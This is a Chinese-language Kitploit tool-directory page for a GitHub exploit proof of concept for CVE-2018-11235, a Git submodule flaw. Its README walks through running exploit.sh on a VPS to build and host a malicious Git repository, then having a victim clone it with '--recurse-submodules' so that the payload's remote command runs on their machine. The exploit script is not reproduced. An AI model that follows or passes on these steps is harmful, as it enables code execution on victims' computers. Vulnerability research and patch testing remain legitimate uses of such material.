Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-11235 — exploit poc for CVE-2018-11235 | Kitploit
工具/GitHubGitHub/rezy-dev/cve-2018-11235
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCommand and Control
GitHubrezy-dev/cve-2018-11235

CVE-2018-11235

exploit poc for CVE-2018-11235

查看仓库
7个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-11235

  1. 通过 ssh 连接到你的 VPS。
  2. 克隆此仓库:
root@kitploit:~
git clone https://github.com/Rezy-Dev/CVE-2018-11235
cd CVE-2018-11235
  1. 为 exploit.sh 添加执行 (x) 权限,然后运行它:
root@kitploit:~
sudo chmod +x exploit.sh
sudo ./exploit.sh

它会下载 apache2 并为我们构建恶意仓库。

  1. 完成后,我们可以使用链接 http://vps-ip/malicious.git 作为 git 仓库。
  2. 当受害者像下面这样克隆时:
root@kitploit:~
git clone --recurse-submodules http://vps-ip/malicious.git

有效载荷的 RCE 命令应该会执行。

谢谢!

下载工具